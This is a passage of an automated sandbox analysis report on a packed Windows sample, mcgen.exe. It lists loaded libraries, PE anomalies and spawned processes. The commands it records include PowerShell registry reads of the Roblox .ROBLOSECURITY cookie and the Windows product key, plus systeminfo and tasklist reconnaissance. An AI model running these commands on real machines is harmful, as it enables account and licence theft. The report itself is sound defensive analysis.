              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windowscodecs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: version.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: mscoree.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptsp.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: rsaenh.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: cryptbase.dll
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wkscli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\getmac.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
              Source: mcgen.exeStatic PE information: Image base 0x140000000 > 0x60000000
              Source: mcgen.exeStatic file information: File size 8042981 > 1048576
              Source: mcgen.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: mcgen.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: mcgen.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: mcgen.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: mcgen.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: mcgen.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: mcgen.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
              Source: mcgen.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: mcgen.exe, 00000002.00000002.2533004812.00007FFD93B77000.00000040.00000001.01000000.00000013.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: mcgen.exe, 00000002.00000002.2533576482.00007FFD93FDA000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: mcgen.exe, 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"userSDIR: "C:\Program Files\OpenSSL\lib\users-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
              Source: Binary string: :C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.pdbhP source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F123000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: mcgen.exe, 00000000.00000003.2120621510.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2539430082.00007FFDAC064000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: mcgen.exe, 00000002.00000002.2533576482.00007FFD93F42000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: mcgen.exe, 00000000.00000003.2120621510.0000024512160000.00000004.00000020.00020000.00000000.sdmp, mcgen.exe, 00000002.00000002.2539430082.00007FFDAC064000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.0.dr
              Source: Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: mcgen.exe, mcgen.exe, 00000002.00000002.2534899570.00007FFD940D1000.00000040.00000001.01000000.0000000B.sdmp
              Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: mcgen.exe, mcgen.exe, 00000002.00000002.2533576482.00007FFD93FDA000.00000040.00000001.01000000.0000000F.sdmp
              Source: Binary string: :C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.pdb source: powershell.exe, 0000003E.00000002.2321464313.000001FC3F123000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 00000067.00000002.2422182749.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmp, rar.exe, 00000067.00000000.2410225338.00007FF695D40000.00000002.00000001.01000000.0000001A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: mcgen.exe, 00000002.00000002.2538780635.00007FFDA5491000.00000040.00000001.01000000.0000000D.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: mcgen.exe, 00000002.00000002.2537613494.00007FFDA34F1000.00000040.00000001.01000000.00000006.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: mcgen.exe, 00000002.00000002.2537894188.00007FFDA3A81000.00000040.00000001.01000000.00000011.sdmp
              Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WA source: mcgen.exe
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: mcgen.exe, 00000002.00000002.2537371109.00007FFDA349B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: mcgen.exe, 00000002.00000002.2538594297.00007FFDA4DA1000.00000040.00000001.01000000.00000012.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: mcgen.exe, 00000002.00000002.2537371109.00007FFDA349B000.00000040.00000001.01000000.00000008.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: mcgen.exe, 00000002.00000002.2538398509.00007FFDA4161000.00000040.00000001.01000000.00000009.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: mcgen.exe, 00000002.00000002.2538121541.00007FFDA3AE1000.00000040.00000001.01000000.0000000C.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: mcgen.exe, 00000002.00000002.2537138652.00007FFDA3451000.00000040.00000001.01000000.0000000A.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: mcgen.exe, 00000002.00000002.2535253168.00007FFD94659000.00000040.00000001.01000000.00000004.sdmp
              Source: Binary string: D:\a\1\b\libssl-3.pdb source: mcgen.exe, mcgen.exe, 00000002.00000002.2536395323.00007FFDA33C5000.00000040.00000001.01000000.00000010.sdmp
              Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: mcgen.exe, 00000002.00000002.2536860815.00007FFDA3411000.00000040.00000001.01000000.0000000E.sdmp
              Source: mcgen.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: mcgen.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: mcgen.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: mcgen.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: mcgen.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

              Data Obfuscation

              barindex
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: VCRUNTIME140.dll.0.drStatic PE information: 0x78BDDED1 [Sat Mar 11 17:01:05 2034 UTC]
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ppw2wipr\ppw2wipr.cmdline"
              Source: C:\Users\user\Desktop\mcgen.exeCode function: 2_2_00007FFD948A5DD0 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,2_2_00007FFD948A5DD0
              Source: ppw2wipr.dll.67.drStatic PE information: real checksum: 0x0 should be: 0x10ca3
              Source: python313.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x1c507d
              Source: _ctypes.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x12948
              Source: unicodedata.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x4f800
              Source: _bz2.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1aa93
              Source: mcgen.exeStatic PE information: real checksum: 0x7b1fca should be: 0x7aed9b
              Source: libffi-8.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xa1d1
              Source: _ssl.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x172ba
              Source: sqlite3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0xae9be
              Source: libcrypto-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x197f77
              Source: _queue.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0xb09a
              Source: _socket.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x14770
              Source: _decimal.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x26383
              Source: _hashlib.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x18eb4
              Source: libssl-3.dll.0.drStatic PE information: real checksum: 0x0 should be: 0x4330c
              Source: select.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x8e73
              Source: _lzma.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x1cde8
              Source: _sqlite3.pyd.0.drStatic PE information: real checksum: 0x0 should be: 0x11179
              Source: libffi-8.dll.0.drStatic PE information: section name: UPX2
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
              Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD32BDD2A5 pushad ; iretd 11_2_00007FFD32BDD2A6
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD32CF00BD pushad ; iretd 11_2_00007FFD32CF00C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD32CF862B push ebx; ret 11_2_00007FFD32CF86CA
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD32CF861B push ebx; ret 11_2_00007FFD32CF862A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 62_2_00007FFD32D000BD pushad ; iretd 62_2_00007FFD32D000C1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
              Source: initial sampleStatic PE information: section name: UPX1
              Source: initial sampleStatic PE information: section name: UPX0
